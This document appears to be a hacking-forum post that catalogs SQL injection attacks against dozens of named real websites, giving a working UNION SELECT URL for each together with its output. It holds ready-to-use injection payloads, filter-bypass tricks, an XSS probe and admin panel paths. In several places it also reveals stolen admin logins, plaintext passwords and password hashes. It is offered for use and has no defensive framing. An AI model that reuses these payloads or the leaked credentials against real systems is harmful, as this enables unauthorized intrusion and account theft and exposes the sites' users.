9to5.org
Code:
_http://www.9to5.org/action/index.php?story=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10/*
4.1.21-community-nt:[email protected]:toorg1

www.orionbag.com
Code:
_http://www.orionbag.com/index.php?story=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
5.0.24A-STANDARD-LOG:[email protected]:ONIONBAG

47 tables:
Code:
CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS COPA_CHART COPA_TEAMS FFA_AP FFA_ASARC FFA_ASCORE FFA_BLOG FFA_LA FFA_LEAGUE FFA_PLAYER FFA_PSARC FFA_SCORE FFA_SEASON1 MAILLIST ORB_IMAGE ORB_ISSUE ORB_POST ORB_STORY T_BLOG T_IMAGE T_ISSUE T_LINKS T_LINKSRANK T_LINKSRATE T_POST T_STORY
T_USER - interesting table, fields USERID,USERNAME,SP3SHUL,PROFILE,ACTIVATED,EMAIL, MODIFIED,CREATED,TYPE,NAMECHECK,MAILLIST
T_USERCOPY WC_CHART WC_GTOTALS WC_TEAMS WC_VENUE

Looking at the columns of table t_user
Code:
_http://www.orionbag.com/index.php?story=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=char(116,95,117,115,101,114)+limit+1,1/*

Looking at the records of table t_user
Code:
_http://www.orionbag.com/index.php?story=-1+union+select+1,concat(USERID,0x3a,USERNAME,0x3a,SP3SHUL,0x3a,PROFILE,0x3a,ACTIVATED,0x3a,EMAIL,0x3a,MODIFIED,0x3a,CREATED,0x3a,TYPE,0x3a,NAMECHECK,0x3a,MAILLIST),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+t_user+limit+0,1/*

Looks like there is only one user...
RockForLife.org
Code:
http://www.rockforlife.org/action_tellyourprolifestory.php?storyID=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
5.0.45-log:all_onlinebase:[email protected]

Table login:
Code:
http://www.rockforlife.org/action_tellyourprolifestory.php?storyID=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,pass,email),0x71),0x71),3,4,5,6,7,8+from+login+limit+0,1/*

Interesting fields:
Code:
user,pass,email

Data:

This site is part of the _http://www.all.org project (as most of the mailboxes show!), which also has bugs... Who knows, maybe they run on the same server...
linux.uta.edu
Code:
http://linux.uta.edu/article.php?pid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5/*
5.0.22-log:linux:[email protected]

scaraye.com
Code:
http://www.scaraye.com/article.php?rub=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/*&sr=49
4.0.16-standard:my37767:[email protected]

macmerc.com
Code:
http://www.macmerc.com/article.php?sid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12/*
4.1.20-log:macmerc_nuke:[email protected]

inthefray.com
Code:
http://www.inthefray.com/html/article.php?sid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/*
5.0.24a-standard-log:mpn_itfmag:[email protected]

The mpn_users table has fields such as:
Code:
name,uname,pass,email,femail,emailpass,user_icq,user_aim,user_yim,user_msnm
HTML:
http://www.smithhomework.us/article.php?sid=999+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8/*
4.0.27-standard
jsmith_peanut@localhost
jsmith_website

HTML:
http://www.prophecies.us/article.php?sid=9999+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8/*
4.1.22-max-log
[email protected]
prophet_site
kino.ru
Code:
http://kino.ru/cinema.php?id=999+union+select+1,2,3,4,5,6,7/*
version() 4.1.22-standard-log well, who cares))
user() u6635_1@localhost
database() u6635_1
users ~950-100 in the database
Code:
http://kino.ru/cinema.php?id=999+union+select+1,2,3,concat(id,%22:%22,login,%22:%22,psswd,%22:%22,email),5,6,7+from+users+limit+0,1000/*
some of them...
Code:
format id:login:psswd:email

xss
Code:
http://kino.ru/cinema.php?id=999+union+select+1,"<script>alert()</script>",3,4,5,6,7+from+users+limit+0,1000/*

admin panel
http://kino.ru/admin
Code:
smoker 7924439

sites on this server (2ip.ru/server)

did not upload a shell

passionfordancing.co.uk
Code:
http://www.passionfordancing.co.uk/country.php?rID=100+union+select+1,2,3,4,5,6
version() 5.0.54
user() passionforda@localhost
database() passionforda
Code:
http://www.passionfordancing.co.uk/country.php?rID=100+union+select+1,2,concat(adminid,char(58),password),4,5,6+from+tbladmin+limit+0,100--

admin panel
Code:
www.passionfordancing.co.uk/admin
[email protected]:ki11kenny1970

in neither the first nor the second case did I get access to mysql.user =//
www.perfectummobile.com
5.0.26-standard
admin:9af41a03da452b8c2549aff071ed22fe:sayqal but the password does not work
cdmadmin:9622f76499e8588addb05838587a8e8f - maybe this one will work - but I did not decrypt it
http://www.perfectummobile.com/admin/admin
http://www.perfectummobile.com/admin/phpinfo.php
http://www.perfectummobile.com/admin/smarty
www.games.zbeng.net
http://games.zbeng.net/game.php?id=-8+union+select+concat(username,char(58),password),2,3,4+from+users+limit+1,10/*
Output is in the title
http://zbeng.net/admin.php- admin panel
Too bad that everything in the admin panel is done through ****...(stupid language=)))
-----------------------------------------------------------------------
www.pfl.com.ua
http://www.pfl.com.ua/game.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
Found the table adm
The adm table has a column name
A couple of Brazilian resources:

http://www.visitadopapa.org.br/pagina.php?id=48+and+1=2+union+all+select+1,concat(user,char(58),password,char(58)),3+from+mysql.user/*
http://www.visitadopapa.org.br/admin/
(no comments) root: farofa

http://www.midiasemmascara.com.br/editoria.php?id=8+and+1=2+union+select+concat_ws(0x3A,usuario,login,permissao),2+from+db_admusers/*
where the fields are:
usuario - login
login - password

http://www.revistainovacao.uniemp.br/materia.php?id=83+and+1=2+union+select+1,2,3,4,5,6,concat_ws(0x3A,nome,login,senha,ativo),8,9,10,11,12,13,14,15,16,17,18+from+usuario/*

http://www.kaxi.com.br/area.php?id=6+and+1=2+union+select+table_name,2,3+from+information_schema.tables+limit+20,1/*
Since I have trouble with Brazilian, or more precisely I do not know it at all, I could not find an interesting table; the only familiar word is email ). Although "MySQL" is indeed present.
_http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_password,5,6,7+from+user/* _http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,concat(email,0x3a,password),7,8+from+users/*
www.game-sector.ru
http://www.game-sector.ru/game.php?id=973+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
4.1.22/[email protected]/d8242sd5804
-----------------------------------------------------------------------
www.isimulacrum.com
http://www.isimulacrum.com/game.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
There are interesting tables:
Log
Contributors
-----------------------------------------------------------------------
http://www1.redikod.com/www.nordicgameportal.com/game.php?id=-1+union+select+1,2,3,4,concat(username,char(58),pwd),6,7,8,9,10,11,12,13,14,15,16+from+users/*
There is access to mysql.user
-----------------------------------------------------------------------
http://www.isteoyun.com/game.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10,11/*
5.0.27/root@localhost/isteoyun
boxing78.ru
HTML:
http://www.boxing78.ru/?c=-7+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7/*
USER[email protected]
VERSION:4.1.20
DATABASEroBoxSQL

mtlaurelbaseball.org
HTML:
http://www.mtlaurelbaseball.org/team.php?id=1+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1/*
USER:mtlaurel_1@localhost
VERSION:4.1.22-standard
DATABASE:mtlaurel_1
kraspol.ru
http://kraspol.ru/news.php?nid=59000+union+select+1,2,3,4,5,6,7,8/*
http://vesti-ural.ru/news.php?nid=1064999+union+select+1,2,3,4,concat(id,char(58),name,char(58),email),6,7,8,9,10,11,12,13+from+users+limit+5,60/*
version() 4.1.22
user() kraspol@localhost
database() wwwkraspolru

vesti-ural.ru
version() 5.0.33-log
user() siteuser@localhost
database() vesti_ural
the path to the script is /usr/Internet/WebSRV/news.php, learned from a MySQL error.

tables
Code:
CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS apps comments fotoimage fotorep images keywords left_nav_banners left_nav_panel menuitems mitemsect news newscomm newsimag newskeys newsrubr prg_items prg_weeks rubrics sections showapps terms
users - columns id, name, email, found no passwords =/
vipusks w_city w_day w_descr w_ekaburg w_nebulosity w_precipitation w_weather w_winddir

contents of users
Code:
format ID:name:email

admin panel
Code:
http://vesti-ural.ru/admin
did not try to get in there

tnuva.ru
http://www.tnuva.ru/recipes.php?rid=69699+union+select+1,2,3,4,5,6/*
version() 5.0.45-community-log
user() optionsw_ru01@localhost
database() optionsw_ru01
columns in users
Code:
online votes addr created city email phone thumb filename lastname firstname uid

stjag.ru
"+" is filtered, so I use "/**/"
Code:
http://www.stjag.ru/new.php?nid=2944799/**/union/**/select/**/1,2,3,4,5,666,7,8,9,10,11,12,13,14/*
look at the result in <title></title>
Code:
http://www.stjag.ru/new.php?nid=2944799/**/union/**/select/**/1,2,3,4,5,concat(version(),char(58),user(),char(58),database()),7,8,9,10,11,12,13,14/*
version() 4.1.22
user() dbu_ansimov_1@localhost
database() db_ansimov_6
Code: http://ukrfoto.dp.ua/download.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a%20%20,database()),3,4,5,6/* 4.1.22-log:ukrfoto@saturn:ukrfoto
www.cri-service.nl
4.1.11-standard::cri_cvcri::cri_cri@localhost
Did not look for tables; maybe someone will find it interesting.
HTML:
http://boardpros.net/index.php?menu=forum_catview&catid=9999+union+select+1,2,3,4,5,concat_ws(0x3a,username,upass,uemail),7+from+users/*

HTML:
http://vostokmedia.com/news.details.php?id=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15/*
4.1.22-standard-log
vostokmedia@localhost
vostokmedia

HTML:
http://www.domkino.spb.ru/description.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,login,password,email,name),11,12+from+user/*
shurik:ahin:[email protected]:Шурик
4.1.21-log
[email protected]
domkinospbru
www.pcper.com
Code:
http://www.pcper.com/comments.php?nid=-5058+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6/*
5.0.22:root@localhostCPerspective
Code:
http://www.pcper.com/comments.php?nid=-5058+union+select+1,2,3,4,concat_ws(0x3a,userid,username,password),6+from+users/*
userid: username: password

admin panel
Code:
http://www.pcper.com/admin/index.php

www.gurufocus.com
Code:
http://www.gurufocus.com/fairvalue.php?user_id=-27097+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4/*
4.1.22-standard:gurufocu_add@localhost:gurufocu_forum
http://f-forpost.ru/product.asp?id=-1+or+1=@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
http://f-forpost.ru/product.asp?id=-1+or+1=(select+db_name())--
forpost
http://f-forpost.ru/product.asp?id=-1+or+1=(select+system_user)--
sa
----------------------------------------------------------------------------
http://www.coldplace.ru/textmus.php?cd=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user())/*&song=2&name=&id2=1
4.1.20-lk-log/coldplac/coldplac@localhost
--------------------------------------------------------------------------
aprelevka.ru
http://www.aprelevka.ru/gallery/index.php?p=image_view&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),8,9,10/*
4.1.11/aprelevka/root@localhost
http://www.aprelevka.ru/gallery/index.php?p=image_view&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,login,password,email),8,9,10+from+users+limit+0,1/*
login/hash/email
admin/4f2abf1ca5cfd9d21209d6ee83181f16/[email protected]
HTML:
http://www.bsigroup.ru/outgoing/context.php?id=22&this=9999'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
5.0.22
bsigroup_newwww@localhost
bsigroup_out
table _system_user, and both the logins and the passwords are hashed; here is what I got:
login / pass
www.maxygen.com
Code:
http://www.maxygen.com/newsview.php?listid=-293+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),user(),database()),20,21,22,23/*
4.1.20:[email protected]:maxadmin_sqlstar

www.bi-me.com
Code:
http://www.bi-me.com/main.php?id=-16202+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/*&t=1&c=33&cg=4
4.1.22-standard:bime_sgadmin@localhost:bime_totalcontent

www.ilika.com
Code:
http://www.ilika.com/main.php?id=-7+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/*
4.1.18-standard:ilikaadm_www@localhost:ilikaadm_www

www.swedishclub.com
Code:
http://www.swedishclub.com/main.php?id=-113+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6,7/*&menuid=52
4.1.18-nt:root@localhost:content

www.igp.pt
Code:
http://www.igp.pt/main.php?Id=-17+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*&Lingua=PT
4.0.14-STANDARD:JAFONSO@OCTOPUS:WOF